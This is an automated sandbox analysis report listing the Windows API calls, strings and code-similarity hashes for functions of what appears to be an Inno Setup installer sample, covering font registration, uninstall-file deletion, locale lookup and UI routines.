                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$Color$Draw$OffsetRect
                                                                                            • String ID:
                                                                                            • API String ID: 1005981011-0
                                                                                            • Opcode ID: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
                                                                                            • Instruction ID: cbf23e484866fe7d62e86adeccfbc8e31d2d10e105370748ca703b53abdb5865
                                                                                            • Opcode Fuzzy Hash: 123096c916c42e02757bf989d00a9b95c02b0ee4bc6ed772870494fbc1b7a223
                                                                                            • Instruction Fuzzy Hash: 6821EFB42015047FC710FB2ACC8AE8B7BDCDF19319B01457A7918EB393C678DD408669
                                                                                            APIs
                                                                                              • Part of subcall function 0044FF8C: SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                                              • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 004949E1
                                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 004949F5
                                                                                            • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00494A0F
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A1B
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A21
                                                                                            • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00494A34
                                                                                            Strings
                                                                                            • Deleting Uninstall data files., xrefs: 00494957
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                            • String ID: Deleting Uninstall data files.
                                                                                            • API String ID: 1570157960-2568741658
                                                                                            • Opcode ID: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
                                                                                            • Instruction ID: d482532eb754b17a04c62f956e406d56ab6d113e5f4ee6e28585aa8da354e785
                                                                                            • Opcode Fuzzy Hash: bec7e58c8e8652e4e27547219572b8e830921b9b91ef48d9c2f0a1ff48f1478a
                                                                                            • Instruction Fuzzy Hash: 0E219170344204AEEB10EBBAFD42F1737A8D799718F10003BB5049A2E3D67C9C059B6D
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD,?,?,?,?,00000000), ref: 0046F247
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046F2DD), ref: 0046F25E
                                                                                            • AddFontResourceA.GDI32(00000000), ref: 0046F27B
                                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046F28F
                                                                                            Strings
                                                                                            • AddFontResource, xrefs: 0046F299
                                                                                            • Failed to open Fonts registry key., xrefs: 0046F265
                                                                                            • Failed to set value in Fonts registry key., xrefs: 0046F250
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                            • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                            • API String ID: 955540645-649663873
                                                                                            • Opcode ID: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
                                                                                            • Instruction ID: 6d7729dfe4f1a7c8b63a61044efa00ce4130ce7f95034744da23bbcbb22f00e6
                                                                                            • Opcode Fuzzy Hash: 1264b81307f1a253542a8e0b58bb590f8fe1136343aa9e8d3130bb5ce7f1cb5f
                                                                                            • Instruction Fuzzy Hash: CC21B278B402007BDB10EBA6AC52F5E779CDB45704F604077B940EB3C2EA7D9D098A6E
                                                                                            APIs
                                                                                              • Part of subcall function 00416420: GetClassInfoA.USER32(00400000,?,?), ref: 0041648F
                                                                                              • Part of subcall function 00416420: UnregisterClassA.USER32(?,00400000), ref: 004164BB
                                                                                              • Part of subcall function 00416420: RegisterClassA.USER32(?), ref: 004164DE
                                                                                            • GetVersion.KERNEL32 ref: 00462588
                                                                                            • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 004625C6
                                                                                            • SHGetFileInfo.SHELL32(00462664,00000000,?,00000160,00004011), ref: 004625E3
                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00462601
                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00462664,00000000,?,00000160,00004011), ref: 00462607
                                                                                            • SetCursor.USER32(?,00462647,00007F02,00462664,00000000,?,00000160,00004011), ref: 0046263A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                            • String ID: Explorer
                                                                                            • API String ID: 2594429197-512347832
                                                                                            • Opcode ID: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
                                                                                            • Instruction ID: 5d8862978945b954f1aea40d900f189da683ff410d790468fedd90432f5e16a2
                                                                                            • Opcode Fuzzy Hash: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
                                                                                            • Instruction Fuzzy Hash: DE21E7707407047AE725BB798D47F9A76D89B08708F50407FB605EA1C3E9BD8C1486AE
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
                                                                                            • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02192BDC,?,?,?,02192BDC), ref: 00476E74
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,02192BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                            • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                            • API String ID: 2704155762-2318956294
                                                                                            • Opcode ID: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
                                                                                            • Instruction ID: d2756be845a9a7cec8c09e5f4573334ab46b2fb936870a4cb364c11667d86bc7
                                                                                            • Opcode Fuzzy Hash: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
                                                                                            • Instruction Fuzzy Hash: E301D654340F0436EA30317A8C86FBB644E8B40769F158137BA1CEA2D2DAAC8D15127E
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,004596AE,?,00000000,00000000,00000000,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 004595F2
                                                                                              • Part of subcall function 00453910: FindClose.KERNEL32(000000FF,00453A06), ref: 004539F5
                                                                                            Strings
                                                                                            • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459667
                                                                                            • Deleting directory: %s, xrefs: 0045957B
                                                                                            • Stripped read-only attribute., xrefs: 004595B4
                                                                                            • Failed to strip read-only attribute., xrefs: 004595C0
                                                                                            • Failed to delete directory (%d)., xrefs: 00459688
                                                                                            • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 004595CC
                                                                                            • Failed to delete directory (%d). Will retry later., xrefs: 0045960B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseErrorFindLast
                                                                                            • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                            • API String ID: 754982922-1448842058
                                                                                            • Opcode ID: 57e0c8ccebeb7184da741e20b7d6bda7044560dbf179fd464141c630ba455fd8
                                                                                            • Instruction ID: 65fff70db6fa7d9e45c4e30736062023b7b7828f3df3317cc7ecb80ce87614ba
                                                                                            • Opcode Fuzzy Hash: 57e0c8ccebeb7184da741e20b7d6bda7044560dbf179fd464141c630ba455fd8
                                                                                            • Instruction Fuzzy Hash: 7841A330A04209DBCB11DB6AC8013AE76A55F49306F55857FAC0197393DB7C8E0D876E
                                                                                            APIs
                                                                                            • GetCapture.USER32 ref: 00422EB4
                                                                                            • GetCapture.USER32 ref: 00422EC3
                                                                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
                                                                                            • ReleaseCapture.USER32 ref: 00422ECE
                                                                                            • GetActiveWindow.USER32 ref: 00422EDD
                                                                                            • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
                                                                                            • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
                                                                                            • GetActiveWindow.USER32 ref: 00422FCF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                            • String ID:
                                                                                            • API String ID: 862346643-0
                                                                                            • Opcode ID: 0c435bf511bce9c0c4602d4c311bc19cd41662654068aa8a958521a418b0f2a9
                                                                                            • Instruction ID: db8aa600a50c93bece591f99e5806f4c3f5e9428d1b568cd9ed9aa9c7d903083
                                                                                            • Opcode Fuzzy Hash: 0c435bf511bce9c0c4602d4c311bc19cd41662654068aa8a958521a418b0f2a9
                                                                                            • Instruction Fuzzy Hash: 0A413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF540AB392DB789E40DB5D
                                                                                            APIs
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0042F12E
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0042F145
                                                                                            • GetActiveWindow.USER32 ref: 0042F14E
                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F17B
                                                                                            • SetActiveWindow.USER32(?,0042F2AB,00000000,?), ref: 0042F19C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveLong$Message
                                                                                            • String ID:
                                                                                            • API String ID: 2785966331-0
                                                                                            • Opcode ID: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
                                                                                            • Instruction ID: 66ba457b2775015b13cc3341b2fd0efd1cc0de66d5492798f2afbbc1fd9aa33e
                                                                                            • Opcode Fuzzy Hash: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
                                                                                            • Instruction Fuzzy Hash: 7B31B474A00654EFDB01EFB6DC52D6EBBB8EB09714F9144BAF804E3291D6399D10CB68
                                                                                            APIs
                                                                                            • 73A0A570.USER32(00000000), ref: 0042949A
                                                                                            • GetTextMetricsA.GDI32(00000000), ref: 004294A3
                                                                                              • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004294B2
                                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004294C6
                                                                                            • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
                                                                                            • GetSystemMetrics.USER32(00000006), ref: 004294F3
                                                                                            • GetSystemMetrics.USER32(00000006), ref: 0042950D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                                            • String ID:
                                                                                            • API String ID: 361401722-0
                                                                                            • Opcode ID: ddddefcdf100d818f5398c04065f48e60301a070589a14b18048d2092dd0edfb
                                                                                            • Instruction ID: 4657f5dde1e086c017b18360b1712f1689f4efb7679c0f09225e2053bbf18421
                                                                                            • Opcode Fuzzy Hash: ddddefcdf100d818f5398c04065f48e60301a070589a14b18048d2092dd0edfb
                                                                                            • Instruction Fuzzy Hash: F701E1917087513BFB11B67A9CC2F6B61D8CB84358F44043FFA459A3D2D96C9C80866A
                                                                                            APIs
                                                                                            • 73A0A570.USER32(00000000,?,00419069,004970A2), ref: 0041DE37
                                                                                            • 73A14620.GDI32(00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE41
                                                                                            • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE4E
                                                                                            • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
                                                                                            • GetStockObject.GDI32(00000007), ref: 0041DE6B
                                                                                            • GetStockObject.GDI32(00000005), ref: 0041DE77
                                                                                            • GetStockObject.GDI32(0000000D), ref: 0041DE83
                                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ObjectStock$A14620A480A570IconLoad
                                                                                            • String ID:
                                                                                            • API String ID: 2920975243-0
                                                                                            • Opcode ID: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
                                                                                            • Instruction ID: b4cf756beaef1adc4f5fbcf44fabff1cc3cb88bfcb9329de381bdc5a6adb432b
                                                                                            • Opcode Fuzzy Hash: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
                                                                                            • Instruction Fuzzy Hash: 88113DB06443015EE740FF665896BAA3690DB24708F04813FF645AF2D2DB7D1CA49BAE
                                                                                            APIs
                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00462A6C
                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,00462B01), ref: 00462A72
                                                                                            • SetCursor.USER32(?,00462AE9,00007F02,00000000,00462B01), ref: 00462ADC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$Load
                                                                                            • String ID: $ $Internal error: Item already expanding
                                                                                            • API String ID: 1675784387-1948079669
                                                                                            • Opcode ID: ad683674f4580f1e1aa17f5a9c1d46edd0719ef7fbd07970485d4df48dda1b37
                                                                                            • Instruction ID: 09c47418b275a9072aadbefc454c559749aab815838d7f365e24efc4a4a37fb5
                                                                                            • Opcode Fuzzy Hash: ad683674f4580f1e1aa17f5a9c1d46edd0719ef7fbd07970485d4df48dda1b37
                                                                                            • Instruction Fuzzy Hash: 0DB1A530600A04EFD720DF69D685B9ABBF1FF44304F1484AAE8459B7A2D7B8ED45CB19
                                                                                            APIs
                                                                                            • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00475755
                                                                                            • 73A159E0.USER32(00000000,000000FC,004756B0,00000000,00475994,?,00000000,004759BE), ref: 0047577C
                                                                                            • GetACP.KERNEL32(00000000,00475994,?,00000000,004759BE), ref: 004757B9
                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004757FF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: A159ClassInfoMessageSend
                                                                                            • String ID: COMBOBOX$Inno Setup: Language
                                                                                            • API String ID: 3375322265-4234151509
                                                                                            • Opcode ID: 1ccc6747c3039ead22a329b7f78916889190244fc8c6905f913f87e2f769e72b
                                                                                            • Instruction ID: 765adbbab907e06bc7bf6e6f7cf1d32fb8b56d6e7c29df1de031be62d4a3d325
                                                                                            • Opcode Fuzzy Hash: 1ccc6747c3039ead22a329b7f78916889190244fc8c6905f913f87e2f769e72b
                                                                                            • Instruction Fuzzy Hash: F7815E70A00605DFC710EF69D885A9EB7F5FB09314F1581BAE808EB362D774AD41CB99
                                                                                            APIs
                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742
                                                                                              • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                              • Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale$DefaultSystem
                                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                            • API String ID: 1044490935-665933166
                                                                                            • Opcode ID: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
                                                                                            • Instruction ID: 5b8a50df068a6b2da3a3ead13541c1976fd8fe610af15afaced6bb711b513b54
                                                                                            • Opcode Fuzzy Hash: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
                                                                                            • Instruction Fuzzy Hash: 35513024B00108ABD701FBA69D41A9E77A9DB94304F50C07FA441BB3C6DE3DDE15875E
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
                                                                                            • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
                                                                                              • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
                                                                                            • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
                                                                                              • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
                                                                                            • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                            • String ID: ,$?
                                                                                            • API String ID: 2359071979-2308483597
